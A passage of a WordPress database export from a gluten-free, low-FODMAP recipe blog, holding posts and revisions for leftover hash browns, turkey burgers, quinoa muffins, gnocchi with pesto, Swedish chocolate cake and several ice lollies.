\n','CHRISTMAS DINNER HASH BROWNS','','publish','open','open','','christmas-dinner-hash-browns','','','2020-04-12 23:04:03','2020-04-12 23:04:03','',0,'http://tummyrevolution.com/?p=4701',0,'post','',0),(4702,1,'2020-04-05 00:12:48','2020-04-05 00:12:48','\n

Well, I hope you\'ve all had a lovely Christmas with lots of delicious Christmas food. I absolutely love Christmas food and I do tend to eat more of everything at Christmas. I think it\'s that one time a year when we tend to eat lots and mix a whole lot of different foods over one or two day. Sometimes it can be a bit much for sensitive tummies like mine but I\'ve leaned to avoid or eat less of certain foods such as Yorkshire pudding, stuffing and Brussel sprouts as I now know these will give me digestive problems. Well, Brussel sprouts are quite easy to avoid as I\'m not a fan of them :) I think it\'s one of those things that you either love or hate. We have both lovers and haters of Brussel sprouts in our family so they\'re always on the Christmas table for those who like and can stomach them. I tend to have lots of other tummy friendly vegetable such as broccoli, carrots and green beans. I also make my own Herbed kale and spinach balls which I have instead of ordinary stuffing. I actually think they taste better so no loss there.

If you have any great tummy friendly Christmas food substitutes, please feel free to send me an email. I love hearing what other do and use/eat.

If you\'re anything like us you end up with a lot of leftovers from your Christmas dinner, which is ideal for making these lovely, tummy friendly hash browns. You can use meat, roast potatoes and vegetable leftovers when making this quick and easy meal. Combine it with a fried egg and you have a great brunch.
It\'s a great way of using up all your leftovers and it\'s a new tasty meal.

\n\n\n\n
\"\"/
\n\n\n\n


Serves 4, Prep & Cook time 20 min, 

\n\n\n\n

INGREDIENTS

\n\n\n\n
  • 6-8 leftover boiled or roast potatoes
  • 200g leftover vegetables (choose tummy friendly vegetables such as carrots, broccoli, parsnip, swede)
  • 150g leftover roasted meat (turkey, ham, beef or lamb), shredded
  • 1 sprig rosemary, finely chopped
  • 1 tbsp finely chopped chives (optional)
  • 1-2 tsp mustard
  • 1 tbsp gluten free flour
  • 1 large egg, lightly whisked
  • 1 tbsp sunflower oil
  • Salt and pepper

    Serve with a fried egg
\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. In a bowl, roughly mash the cold potatoes with a fork and dice the leftover vegetables you would like to use
  2. Mix in the leftover meat, mustard, rosemary, chives, egg and season with salt and pepper
  3. Heat a large frying pan on a medium to high heat and add some of the sunflower oil. Shape the mixture into messy patties and add to the frying pan. Cook on one side for a few minutes, then flip them over and cook for a few minutes on the other side. Don’t worry if they break slightly. They don’t need to be perfect
  4. Serve with a fried egg, some extra chopped chives and freshly ground pepper

\n','CHRISTMAS DINNER HASH BROWNS','','inherit','closed','closed','','4701-revision-v1','','','2020-04-05 00:12:48','2020-04-05 00:12:48','',4701,'http://tummyrevolution.com/4701-revision-v1/',0,'revision','',0),(4703,1,'2020-04-12 03:00:00','2020-04-12 03:00:00','\n

I all! I hope you\'re having a good start to 2019

It\'s been a busy start for me. So busy I totally forgot to post this Turkey Burger recipe after Christmas, but as Turkey is not just for Christmas I thought I\'d post it now. (Please just excuse the Christmas light decoration in the background of the photo :)

The good thing with these burgers is that is you can make them with Turkey mince, Turkey leftover (you might still have some in the freezer), Chicken mince or Roast chicken leftovers, so you have lots of options. I personally use this recipe a lot to use up leftovers. We often have large amounts of Turkey leftover from Christmas that I freeze and use up over the following months. During the year we also tend to end up with Sunday dinner chicken leftovers and this recipe comes handy those times.

\n\n\n\n

It might seem strange to add grated carrot but it actually makes the burgers more moist and I also think it enhances the flavour. My children are slightly fuzzy when it comes to vegetables but they love these burgers and I don\'t think they even realise it\'s got carrot in it. Although it does make the burger a bit more orange in color. Served with the crunchy red coleslaw it tastes amazing. If you prefer white cabbage you can use that too.

\n\n\n\n
\"\"/
\n\n\n\n

Hope you enjoy this recipe!

\n\n\n\n

Makes 4-6 burger, Cook & Prep time 30 min

\n\n\n\n


INGREDIENTS

\n\n\n\n

For the burgers

\n\n\n\n
  •  400-500g turkey leftovers or 500g fresh ground/minced turkey
  • 1 medium carrot, grated
  • 1 large egg
  • 1 tsp chopped chives
  • 1 tbsp garlic infused olive oil (or olive oil)
  • 1 tsp salt
  • ¼tsp black pepper
  • 1 tbsp vegetable oil for cooking
  • 4-6 gluten free burger buns
\n\n\n\n

Red cabbage coleslaw

\n\n\n\n
  •  ¼(300g) medium red cabbage
  • 1 medium carrot
  • 2 spring onions (green part only), finely chopped
  • 1 tbsp white wine vinegar
  • 2 tbsp mayonnaise(gluten free if you are Coeliac)
  • ¼tsp Dijon mustard
  • ½tbsp sugar
  • ½tbsp salt
\n\n\n\n

TIP:You can use white cabbage instead of red if you prefer

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

Red cabbage coleslaw

\n\n\n\n
  1. Shred the cabbage as finely as possible and place in a large bowl
  2. Peel and shred the carrot then add to the cabbage
  3. Add salt, sugar and vinegar, mayonnaise, Dijon mustard, spring onions (green bit only) and toss together
\n\n\n\n

Burgers

\n\n\n\n
  1. In a large bowl, combine the shredded turkey (or mince), carrot, chives, egg, garlic infused oil, salt and pepper.
  2. Form the mixture into 4-6 patties
  3. Heat 1 tbsp of the oil in a large frying pan over medium heat. Cook the patties on one side for about 3 minutes until the bottom part is cooked. Turn the patties over, add a touch of water to your pan and cover the pan with a lid. Allow to cook for another 3 minutes until golden brown or until cooked through and there is no trace of pink meat remaining
  4. Serve the burgers on the toasted gluten free burger bread or buns with the cabbage coleslaw
\n','TURKEY BURGER WITH RED CABBAGE COLESLAW','','publish','open','open','','turkey-burger-with-red-cabbage-coleslaw','','','2020-04-12 23:04:14','2020-04-12 23:04:14','',0,'http://tummyrevolution.com/?p=4703',0,'post','',0),(4704,1,'2020-04-12 02:55:00','2020-04-12 02:55:00','\n

I\'m sure you\'ve heard that quinoa\'s is a type of super food with great health benefits but have you ever wondered what quinoa really is? Is it a grain or seed? 

\n\n\n\n

Quinoa is considered a seed rather than a grain and comes from the Chenopodium quinoa plant, a plant that produces seeds rather than fruit. It\'s been farmed in South America for...well hundreds of years but it\'s only become more popular in our part of the world in last decade or so.

\n\n\n\n

Quinoa is free from wheat and gluten and great to use in your cooking if you are celiac, gluten/wheat intolerant or if you are on the low-FODMAP diet. Sensitive tummies love it - I swear!

I can personally not eat wheat so for me quinoa is a cupboard staple. Why? because the health benefits of eating more quinoa is far better then eating say gluten free pasta or rice. This is mainly down to the fact that quinoa contains complex, gluten-free carbohydrates for slow releasing energy. Other interesting and beneficial facts about quinoa is its protein content and other extremely beneficial nutrients.

\n\n\n\n

Lots of foods contain protein but what\'s so special about quinoa is that it contains all 20 amino acids our bodies need to build and repair muscles and tissues. Isn\'t it great we can get it all in one go by just eating one thing! 

Quinoa is also great for our gut and digestion as it contains over half of the manganese you need every day. Manganese impacts hormones and digestive enzymes, making it easier for your body to digest and use the food you eat efficiently. 
Another gut benefit is that the probiotic or undigested fibre compounds in quinoa work with probiotic enzymes to become fuel for the beneficial bacteria living in the gut.

There are other benefits with quinoa such as that it contains disease fighting antioxidants and it aids wight loss and may help fight cancer but I won\'t go into more detail as I\'m sure you get the message by now - Quinoa is simply great for you so let\'s eat more of it!!

\n\n\n\n

Now, the thing with quinoa is that if you simply cook it and eat it as it comes it\'s pretty bland, but like many things bland, mixing or adding a few things to it can make it taste really great and different. You might have come across quinoa as part of a salad where it\'s an ideal ingredient, but there are many other ways you can use it like in bread, stews, porridge or like in these lovely breakfast muffins.

\n\n\n\n

These quinoa and spinach muffins has a great flavour and although I call them a breakfast muffins but they can be eaten as a snack, for lunch or as part of dinner. They are really filling and lovely.

\n\n\n\n

Enjoy!

\n\n\n\n
\"\"/
\n\n\n\n

QUINOA AND SPINNACH BREAKFAST MUFFINS 

Makes 4-6 muffins

\n\n\n\n


INGREDIENTS
Olive oil for greasing the muffin tray
2 eggs
2 egg whites
1 tbsp orange juice
1 cup/200ml/1 large hand full spinach
1 cup/200ml pre cooked quinoa
50g feta cheese
Sea salt and black pepper

INSTRUCTIONS

1. Preheat the oven to 170°C / 350ºF and grease the muffin tray with olive oil

\n\n\n\n

2. Mix the eggs with the orange juice, then add spinach, quinoa, feta and spices

3. pour the mix into the greased muffin tray and bake in the oven for 25 minutes or until the muffins turn a slightly golden brown colour. 

\n','Quinoa and Spinach Breakfast Muffins','','publish','open','open','','quinoa-and-spinach-breakfast-muffins','','','2020-04-12 23:04:23','2020-04-12 23:04:23','',0,'http://tummyrevolution.com/?p=4704',0,'post','',0),(4705,1,'2020-04-05 00:13:15','2020-04-05 00:13:15','\n

I all! I hope you\'re having a good start to 2019

It\'s been a busy start for me. So busy I totally forgot to post this Turkey Burger recipe after Christmas, but as Turkey is not just for Christmas I thought I\'d post it now. (Please just excuse the Christmas light decoration in the background of the photo :)

The good thing with these burgers is that is you can make them with Turkey mince, Turkey leftover (you might still have some in the freezer), Chicken mince or Roast chicken leftovers, so you have lots of options. I personally use this recipe a lot to use up leftovers. We often have large amounts of Turkey leftover from Christmas that I freeze and use up over the following months. During the year we also tend to end up with Sunday dinner chicken leftovers and this recipe comes handy those times.

\n\n\n\n

It might seem strange to add grated carrot but it actually makes the burgers more moist and I also think it enhances the flavour. My children are slightly fuzzy when it comes to vegetables but they love these burgers and I don\'t think they even realise it\'s got carrot in it. Although it does make the burger a bit more orange in color. Served with the crunchy red coleslaw it tastes amazing. If you prefer white cabbage you can use that too.

\n\n\n\n
\"\"/
\n\n\n\n

Hope you enjoy this recipe!

\n\n\n\n

Makes 4-6 burger, Cook & Prep time 30 min

\n\n\n\n


INGREDIENTS

\n\n\n\n

For the burgers

\n\n\n\n
  •  400-500g turkey leftovers or 500g fresh ground/minced turkey
  • 1 medium carrot, grated
  • 1 large egg
  • 1 tsp chopped chives
  • 1 tbsp garlic infused olive oil (or olive oil)
  • 1 tsp salt
  • ¼tsp black pepper
  • 1 tbsp vegetable oil for cooking
  • 4-6 gluten free burger buns
\n\n\n\n

Red cabbage coleslaw

\n\n\n\n
  •  ¼(300g) medium red cabbage
  • 1 medium carrot
  • 2 spring onions (green part only), finely chopped
  • 1 tbsp white wine vinegar
  • 2 tbsp mayonnaise(gluten free if you are Coeliac)
  • ¼tsp Dijon mustard
  • ½tbsp sugar
  • ½tbsp salt
\n\n\n\n

TIP:You can use white cabbage instead of red if you prefer

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

Red cabbage coleslaw

\n\n\n\n
  1. Shred the cabbage as finely as possible and place in a large bowl
  2. Peel and shred the carrot then add to the cabbage
  3. Add salt, sugar and vinegar, mayonnaise, Dijon mustard, spring onions (green bit only) and toss together
\n\n\n\n

Burgers

\n\n\n\n
  1. In a large bowl, combine the shredded turkey (or mince), carrot, chives, egg, garlic infused oil, salt and pepper.
  2. Form the mixture into 4-6 patties
  3. Heat 1 tbsp of the oil in a large frying pan over medium heat. Cook the patties on one side for about 3 minutes until the bottom part is cooked. Turn the patties over, add a touch of water to your pan and cover the pan with a lid. Allow to cook for another 3 minutes until golden brown or until cooked through and there is no trace of pink meat remaining
  4. Serve the burgers on the toasted gluten free burger bread or buns with the cabbage coleslaw
\n','TURKEY BURGER WITH RED CABBAGE COLESLAW','','inherit','closed','closed','','4703-revision-v1','','','2020-04-05 00:13:15','2020-04-05 00:13:15','',4703,'http://tummyrevolution.com/4703-revision-v1/',0,'revision','',0),(4706,1,'2020-04-05 00:14:22','2020-04-05 00:14:22','\n

I\'m sure you\'ve heard that quinoa\'s is a type of super food with great health benefits but have you ever wondered what quinoa really is? Is it a grain or seed? 

\n\n\n\n

Quinoa is considered a seed rather than a grain and comes from the Chenopodium quinoa plant, a plant that produces seeds rather than fruit. It\'s been farmed in South America for...well hundreds of years but it\'s only become more popular in our part of the world in last decade or so.

\n\n\n\n

Quinoa is free from wheat and gluten and great to use in your cooking if you are celiac, gluten/wheat intolerant or if you are on the low-FODMAP diet. Sensitive tummies love it - I swear!

I can personally not eat wheat so for me quinoa is a cupboard staple. Why? because the health benefits of eating more quinoa is far better then eating say gluten free pasta or rice. This is mainly down to the fact that quinoa contains complex, gluten-free carbohydrates for slow releasing energy. Other interesting and beneficial facts about quinoa is its protein content and other extremely beneficial nutrients.

\n\n\n\n

Lots of foods contain protein but what\'s so special about quinoa is that it contains all 20 amino acids our bodies need to build and repair muscles and tissues. Isn\'t it great we can get it all in one go by just eating one thing! 

Quinoa is also great for our gut and digestion as it contains over half of the manganese you need every day. Manganese impacts hormones and digestive enzymes, making it easier for your body to digest and use the food you eat efficiently. 
Another gut benefit is that the probiotic or undigested fibre compounds in quinoa work with probiotic enzymes to become fuel for the beneficial bacteria living in the gut.

There are other benefits with quinoa such as that it contains disease fighting antioxidants and it aids wight loss and may help fight cancer but I won\'t go into more detail as I\'m sure you get the message by now - Quinoa is simply great for you so let\'s eat more of it!!

\n\n\n\n

Now, the thing with quinoa is that if you simply cook it and eat it as it comes it\'s pretty bland, but like many things bland, mixing or adding a few things to it can make it taste really great and different. You might have come across quinoa as part of a salad where it\'s an ideal ingredient, but there are many other ways you can use it like in bread, stews, porridge or like in these lovely breakfast muffins.

\n\n\n\n

These quinoa and spinach muffins has a great flavour and although I call them a breakfast muffins but they can be eaten as a snack, for lunch or as part of dinner. They are really filling and lovely.

\n\n\n\n

Enjoy!

\n\n\n\n
\"\"/
\n\n\n\n

QUINOA AND SPINNACH BREAKFAST MUFFINS 

Makes 4-6 muffins

\n\n\n\n


INGREDIENTS
Olive oil for greasing the muffin tray
2 eggs
2 egg whites
1 tbsp orange juice
1 cup/200ml/1 large hand full spinach
1 cup/200ml pre cooked quinoa
50g feta cheese
Sea salt and black pepper

INSTRUCTIONS

1. Preheat the oven to 170°C / 350ºF and grease the muffin tray with olive oil

\n\n\n\n

2. Mix the eggs with the orange juice, then add spinach, quinoa, feta and spices

3. pour the mix into the greased muffin tray and bake in the oven for 25 minutes or until the muffins turn a slightly golden brown colour. 

\n','Quinoa and Spinach Breakfast Muffins','','inherit','closed','closed','','4704-revision-v1','','','2020-04-05 00:14:22','2020-04-05 00:14:22','',4704,'http://tummyrevolution.com/4704-revision-v1/',0,'revision','',0),(4707,1,'2020-04-12 02:50:00','2020-04-12 02:50:00','\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n

What a lovely weekend it\'s been in the UK with the lovely weather and the beautiful royal wedding. I really enjoyed watching it here in Dubai and my daughter would\'t stop watching until she\'d seen the kiss :)
I wonder what the it was like preparing for a Royal Wedding?  
Here is a picture from inside the royal wedding kitchen where they were preparing truffles ahead of the wedding - pressure!


I\'m not sure what the main course was but I\'m pretty sure it wasn\'t gnocchi like what I had...but you never know :) 
Gnocchi is the kind of food that taste better paired up with something else. Pesto and gnocchi is like a marriage made in heaven (just like Harry and Megan\'s) and I just love it. Store bought pesto is almost always made with garlic, which unfortunately can trigger symptoms in people like me with sensitive tummies. It\'s always better to make your own homemade pesto if you have a troublesome gut. It\'s very easy to make and taste so much better then bought pesto. Once you\'ve made it once, I\'m sure you\'ll be making it all the time.

By adding a some ripe cherry tomatoes and some labs lettuce you get a lovely mix of flavours. 

Hope you enjoy it too.




\n\n\n\n

Serves 1-2 people

Ingredients 
250g gluten free Gnocchi
5-7 ripe cherry tomatoes
1 small handful lambs lettuce

\n\n\n\n

For the pesto
1 large handful of fresh Basil leaves
3 tbsp garlic infused olive oil
2 tbsp + 1 tbsp Pine nuts 
2 tbsp grated Parmesan cheese
1-2 tsp lemon juice (optional)

Instructions
1. Bring a large pan of water to boil over high heat. Add the gnocchi and cook according to package instructions. 

\n\n\n\n

2. Put 2 tablespoons of pine nuts, Parmesan, garlic infused oil, basil and lemon juice in a food processor (or use a hand held blender)  and whizz to a smooth paste. 

3. Drain the Gnocchi and mix in the pesto, lambs lettuce and halved cherry tomatoes. Sprinkle over the remaining pine nuts. 

\n\n\n\n

4. Serve immediately! 

\n','Gluten free Gnocchi with tummy friendly pesto','','publish','open','open','','gluten-free-gnocchi-with-tummy-friendly-pesto','','','2020-04-12 23:04:32','2020-04-12 23:04:32','',0,'http://tummyrevolution.com/?p=4707',0,'post','',0),(4708,1,'2020-04-05 00:15:19','2020-04-05 00:15:19','\n

Oh my! this cake is just so delicious and everyone in my house loved it. It was gone in minutes and we were literarily scraping the crumbs from the cake tin in the end. My little girl\'s still complaining about not getting enough. I think I\'ll have to make another one very soon. 
Swedes are generally really good at making cakes and we\'ve also got what\'s called a \'fika\' culture. Fika is when you have a coffee/tea break, generally accompanied by biscuits or cake. If you ever visit Sweden make sure you visit a cafe and try some Swedish delights. 
Living abroad, I\'m always keen to keep my Swedish heritage alive, especially when it comes to cakes :)

\n\n\n\n

To be honest, it had been a while since I\'d made a Swedish sticky chocolate cake and the last one I made was with ordinary flour so I wasn\'t sure if a gluten free version would taste any good. Sometimes gluten free cakes can have that distinct flavour I\'m not so keen on and I did worry this cake would not turn out so well. Luckily I was wrong and it turned out so much better then I could\'ve imagined. It doesn\'t taste any different to the original version and it\'s just a really good chocolaty cake. I think it\'s the combination of a softish, toffee like chocolate middle bit combined with a slightly harder/crispier top that makes it so divine. It\'s pretty easy to make too. which is always a plus in my book.

\n\n\n\n

I like serving it with some whipped cream and blueberries but you can also serve it with other berries and chipped coconut cream or lactose free ice-cream.

\n\n\n\n
\"\"/
\n\n\n\n

Bare in mind that the cake will not be very thick and it should have a slightly \'sticky\' middle bit. 

\n\n\n\n

Ingredients

\n\n\n\n
  • 100 g butter
  • 2 eggs
  • 250ml (1 cup) sugar
  • 150ml (just over 1/2 cup) gluten free flour mix 
  • 4 tbsp cacao powder 
  • 1/2 tsp salt 
  • 1-2 drops vanilla extract 
\n\n\n\n

Topping

\n\n\n\n
  • 200ml whipping cream 
  • 1 cup blueberries
\n\n\n\n

Instructions

\n\n\n\n
  • Preheat the oven to 150°C/300F°.
  • Melt the butter and let it cool.
  • Grease a cake tin (24cm/9.5 inches in diameter).
  • Mix together eggs, sugar, vanilla extract and salt. Sift in the cacao and gluten free flour mix.
  • Add the cooled butter and mix until even consistency. Pour the mix into the cake tin and bake in the oven for 25-30 minutes.
  • Whip the cream and serve with the blueberries.
\n\n\n\n
\"\"/
\n','Swedish sticky chocolate cake (gluten free)','','publish','open','open','','swedish-sticky-chocolate-cake-gluten-free','','','2020-04-06 22:53:33','2020-04-06 22:53:33','',0,'http://tummyrevolution.com/?p=4708',0,'post','',0),(4709,1,'2020-04-05 00:15:39','2020-04-05 00:15:39','\n

What better way to cool down in this hot summer weather then with an ice lolly. 
Ice-creams has become a bit of an obsession with me lately and I find I\'m enjoy experimenting with ingredients to come up with the best favours. You can make so many lovely and healthy ice creams using good, tummy friendly ingredients. I will be sharing a few of my favourites with you over the next few weeks.
This time I used coconut yoghurt as one of my main ingredients and they turned out really nice. The granola gives them a bit of a crunch and the raspberry and works well with the sweet strawberries.
The best way to make sure your granola is wheat and gluten free is to make your own. I\'ve not yet shared my favourite granola recipe but I will do this as soon as I can.
It\'s easy to make your own granola and you just need to make sure you\'re using the right nuts, fruit juice and dried fruit in order to keep it tummy friendly. 
If you buy granola, try finding a gluten free option that does\'t contain dried fruit (apart from cranberries), honey or apple juice. 

Ingredients 

\n\n\n\n
  • 100g strawberries
  • 300 ml coconut yoghurt (plain)
  • 1-2 drops of vanilla extract 
  • 1 tsp maple syrup
  • 100 ml / 1/2 cup granola (gluten free & tummy friendly)
  • ice-cream moulds
\n\n\n\n

Instructions

\n\n\n\n

1. Use a fork to mash the strawberries.

\n\n\n\n

2. Mix the yoghurt with the vanilla extract and maple syrup.

\n\n\n\n

3. Get your ice-cream moulds ready and start filling them up by alternating yoghurt, mashed strawberries and granola.

\n\n\n\n

4. Add a stick and freeze. 

\n\n\n\n

5. Enjoy your ice-cream in the sun :)

\n\n\n\n
\"\"/
\n','Strawberry and coconut yoghurt ice lollies','','publish','open','open','','strawberry-and-coconut-yoghurt-ice-lollies','','','2020-04-06 22:53:51','2020-04-06 22:53:51','',0,'http://tummyrevolution.com/?p=4709',0,'post','',0),(4710,1,'2020-04-05 00:14:51','2020-04-05 00:14:51','\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n

What a lovely weekend it\'s been in the UK with the lovely weather and the beautiful royal wedding. I really enjoyed watching it here in Dubai and my daughter would\'t stop watching until she\'d seen the kiss :)
I wonder what the it was like preparing for a Royal Wedding?  
Here is a picture from inside the royal wedding kitchen where they were preparing truffles ahead of the wedding - pressure!


I\'m not sure what the main course was but I\'m pretty sure it wasn\'t gnocchi like what I had...but you never know :) 
Gnocchi is the kind of food that taste better paired up with something else. Pesto and gnocchi is like a marriage made in heaven (just like Harry and Megan\'s) and I just love it. Store bought pesto is almost always made with garlic, which unfortunately can trigger symptoms in people like me with sensitive tummies. It\'s always better to make your own homemade pesto if you have a troublesome gut. It\'s very easy to make and taste so much better then bought pesto. Once you\'ve made it once, I\'m sure you\'ll be making it all the time.

By adding a some ripe cherry tomatoes and some labs lettuce you get a lovely mix of flavours. 

Hope you enjoy it too.




\n\n\n\n

Serves 1-2 people

Ingredients 
250g gluten free Gnocchi
5-7 ripe cherry tomatoes
1 small handful lambs lettuce

\n\n\n\n

For the pesto
1 large handful of fresh Basil leaves
3 tbsp garlic infused olive oil
2 tbsp + 1 tbsp Pine nuts 
2 tbsp grated Parmesan cheese
1-2 tsp lemon juice (optional)

Instructions
1. Bring a large pan of water to boil over high heat. Add the gnocchi and cook according to package instructions. 

\n\n\n\n

2. Put 2 tablespoons of pine nuts, Parmesan, garlic infused oil, basil and lemon juice in a food processor (or use a hand held blender)  and whizz to a smooth paste. 

3. Drain the Gnocchi and mix in the pesto, lambs lettuce and halved cherry tomatoes. Sprinkle over the remaining pine nuts. 

\n\n\n\n

4. Serve immediately! 

\n','Gluten free Gnocchi with tummy friendly pesto','','inherit','closed','closed','','4707-revision-v1','','','2020-04-05 00:14:51','2020-04-05 00:14:51','',4707,'http://tummyrevolution.com/4707-revision-v1/',0,'revision','',0),(4711,1,'2020-04-05 00:15:19','2020-04-05 00:15:19','\n

Oh my! this cake is just so delicious and everyone in my house loved it. It was gone in minutes and we were literarily scraping the crumbs from the cake tin in the end. My little girl\'s still complaining about not getting enough. I think I\'ll have to make another one very soon. 
Swedes are generally really good at making cakes and we\'ve also got what\'s called a \'fika\' culture. Fika is when you have a coffee/tea break, generally accompanied by biscuits or cake. If you ever visit Sweden make sure you visit a cafe and try some Swedish delights. 
Living abroad, I\'m always keen to keep my Swedish heritage alive, especially when it comes to cakes :)

\n\n\n\n

To be honest, it had been a while since I\'d made a Swedish sticky chocolate cake and the last one I made was with ordinary flour so I wasn\'t sure if a gluten free version would taste any good. Sometimes gluten free cakes can have that distinct flavour I\'m not so keen on and I did worry this cake would not turn out so well. Luckily I was wrong and it turned out so much better then I could\'ve imagined. It doesn\'t taste any different to the original version and it\'s just a really good chocolaty cake. I think it\'s the combination of a softish, toffee like chocolate middle bit combined with a slightly harder/crispier top that makes it so divine. It\'s pretty easy to make too. which is always a plus in my book.

\n\n\n\n

I like serving it with some whipped cream and blueberries but you can also serve it with other berries and chipped coconut cream or lactose free ice-cream.

\n\n\n\n
\"\"/
\n\n\n\n

Bare in mind that the cake will not be very thick and it should have a slightly \'sticky\' middle bit. 

\n\n\n\n

Ingredients

\n\n\n\n
  • 100 g butter
  • 2 eggs
  • 250ml (1 cup) sugar
  • 150ml (just over 1/2 cup) gluten free flour mix 
  • 4 tbsp cacao powder 
  • 1/2 tsp salt 
  • 1-2 drops vanilla extract 
\n\n\n\n

Topping

\n\n\n\n
  • 200ml whipping cream 
  • 1 cup blueberries
\n\n\n\n

Instructions

\n\n\n\n
  • Preheat the oven to 150°C/300F°.
  • Melt the butter and let it cool.
  • Grease a cake tin (24cm/9.5 inches in diameter).
  • Mix together eggs, sugar, vanilla extract and salt. Sift in the cacao and gluten free flour mix.
  • Add the cooled butter and mix until even consistency. Pour the mix into the cake tin and bake in the oven for 25-30 minutes.
  • Whip the cream and serve with the blueberries.
\n\n\n\n
\"\"/
\n','Swedish sticky chocolate cake (gluten free)','','inherit','closed','closed','','4708-revision-v1','','','2020-04-05 00:15:19','2020-04-05 00:15:19','',4708,'http://tummyrevolution.com/4708-revision-v1/',0,'revision','',0),(4712,1,'2020-04-05 00:15:39','2020-04-05 00:15:39','\n

What better way to cool down in this hot summer weather then with an ice lolly. 
Ice-creams has become a bit of an obsession with me lately and I find I\'m enjoy experimenting with ingredients to come up with the best favours. You can make so many lovely and healthy ice creams using good, tummy friendly ingredients. I will be sharing a few of my favourites with you over the next few weeks.
This time I used coconut yoghurt as one of my main ingredients and they turned out really nice. The granola gives them a bit of a crunch and the raspberry and works well with the sweet strawberries.
The best way to make sure your granola is wheat and gluten free is to make your own. I\'ve not yet shared my favourite granola recipe but I will do this as soon as I can.
It\'s easy to make your own granola and you just need to make sure you\'re using the right nuts, fruit juice and dried fruit in order to keep it tummy friendly. 
If you buy granola, try finding a gluten free option that does\'t contain dried fruit (apart from cranberries), honey or apple juice. 

Ingredients 

\n\n\n\n
  • 100g strawberries
  • 300 ml coconut yoghurt (plain)
  • 1-2 drops of vanilla extract 
  • 1 tsp maple syrup
  • 100 ml / 1/2 cup granola (gluten free & tummy friendly)
  • ice-cream moulds
\n\n\n\n

Instructions

\n\n\n\n

1. Use a fork to mash the strawberries.

\n\n\n\n

2. Mix the yoghurt with the vanilla extract and maple syrup.

\n\n\n\n

3. Get your ice-cream moulds ready and start filling them up by alternating yoghurt, mashed strawberries and granola.

\n\n\n\n

4. Add a stick and freeze. 

\n\n\n\n

5. Enjoy your ice-cream in the sun :)

\n\n\n\n
\"\"/
\n','Strawberry and coconut yoghurt ice lollies','','inherit','closed','closed','','4709-revision-v1','','','2020-04-05 00:15:39','2020-04-05 00:15:39','',4709,'http://tummyrevolution.com/4709-revision-v1/',0,'revision','',0),(4713,1,'2020-04-12 03:55:00','2020-04-12 03:55:00','\n

Summer always creams out for ice-creams and I really don\'t need much encouragement to make any kind of desserts, treats so ice-creams because I love all of that stuff!
I remember making ice creams growing up. I think we simply poured some juice or squash drink into those moulds and that was it. I\'m glad to say homemade ice-creams have come a long way since my childhood and I just love how many different ice-cream textures and flavours you can make at home. Ice-cream machines can be very handy but you can make many ice-creams without one too, like these pineapple ice-lollies.

As with most of my recipes they are really easy to make, tummy friendly (low-FODMAP) and healthy, so that you can feel good whilst enjoying a cool treat in the sun.

Well, I\'m not sure what you are waiting for. Get them made and start enjoying :)

I\'m off to the freezer to get one for myself!

\n\n\n\n
\"\"/
\n\n\n\n

INGREDIENTS200 g pineapple chunks, fresh or frozen1 cup / 200ml coconut cream1 tsp lime juice1/2 tsp maple syrup (optional)

\n\n\n\n



INSTRUCTIONS
1. Mix the pineapple chunks, coconut cream and lime juice with an electric hand held blender or in a food processor, (or you can hand mix if you chop the pineapple into very small pieces).

\n\n\n\n

2.Taste the mix and depending on the sweetness of the fruit you can decide whether you need to add the maple syrup or not.

\n\n\n\n

3. Pour the mix into ice-cream moulds and add a lolly stick. Freeze for a couple of hours and enjoy.

\n\n\n\n
\"\"/
\n','Pineapple ice lollies','','publish','open','open','','pineapple-ice-lollies','','','2020-04-17 01:00:21','2020-04-17 01:00:21','',0,'http://tummyrevolution.com/?p=4713',0,'post','',0),(4714,1,'2020-04-05 00:16:01','2020-04-05 00:16:01','\n

Summer always creams out for ice-creams and I really don\'t need much encouragement to make any kind of desserts, treats so ice-creams because I love all of that stuff!
I remember making ice creams growing up. I think we simply poured some juice or squash drink into those moulds and that was it. I\'m glad to say homemade ice-creams have come a long way since my childhood and I just love how many different ice-cream textures and flavours you can make at home. Ice-cream machines can be very handy but you can make many ice-creams without one too, like these pineapple ice-lollies.

As with most of my recipes they are really easy to make, tummy friendly (low-FODMAP) and healthy, so that you can feel good whilst enjoying a cool treat in the sun.

Well, I\'m not sure what you are waiting for. Get them made and start enjoying :)

I\'m off to the freezer to get one for myself!

\n\n\n\n
\"\"/
\n\n\n\n

INGREDIENTS200 g pineapple chunks, fresh or frozen1 cup / 200ml coconut cream1 tsp lime juice1/2 tsp maple syrup (optional)

\n\n\n\n



INSTRUCTIONS
1. Mix the pineapple chunks, coconut cream and lime juice with an electric hand held blender or in a food processor, (or you can hand mix if you chop the pineapple into very small pieces).

\n\n\n\n

2.Taste the mix and depending on the sweetness of the fruit you can decide whether you need to add the maple syrup or not.

\n\n\n\n

3. Pour the mix into ice-cream moulds and add a lolly stick. Freeze for a couple of hours and enjoy.

\n\n\n\n
\"\"/
\n','Pineapple ice lollies','','inherit','closed','closed','','4713-revision-v1','','','2020-04-05 00:16:01','2020-04-05 00:16:01','',4713,'http://tummyrevolution.com/4713-revision-v1/',0,'revision','',0),(4715,1,'2020-04-05 00:16:29','2020-04-05 00:16:29','\n

I\'ve had a bit of an ice cream obsession lately. It\'s just been so much fun experimenting with flavours and ingredients so I just kept going. Tasting ice cream is not so bad either and especially when it\'s summer and the weather is great.
My children are great at tasting my cooking and their opinion is generally very honest, a bit too honest sometimes perhaps. I know children\'s taste buds are not quite the same as adults but I think their taste speaks for many in general, especially when it comes to ice creams. This strawberry ice-cream is a favourite of theirs and with their stamp of approval, I feel it\'s good enough to share with you.

\n\n\n\n
\"\"/
\n\n\n\n


I\'ve made ice-cream using bananas before and I guess I thought they were ok but not great. I really wanted it to taste great because it\'s so healthy, but something was missing and I just could\'t put my finger on it.....until recently. It wasn\'t until I added macadamia nuts that it finally all came together and I managed to get that lovely creamy consistency and flavour that I believe an ice-cream should have. 

I personally don\'t like using over ripe bananas as I think the ice cream just taste of... overripe bananas then. The bananas needs to be ripe but note overripe to get the right flavour. Also, you\'ll want to use \'fresh\' macadamia nuts when you make ice cream. If you have macadamia nuts (like I once had) that have been in your cupboard for some time, they have a tendency of taking on this strange flavour that will be transferred to your ice-cream. It totally ruined one batch for me :( So keep to fresh nuts :)

\n\n\n\n

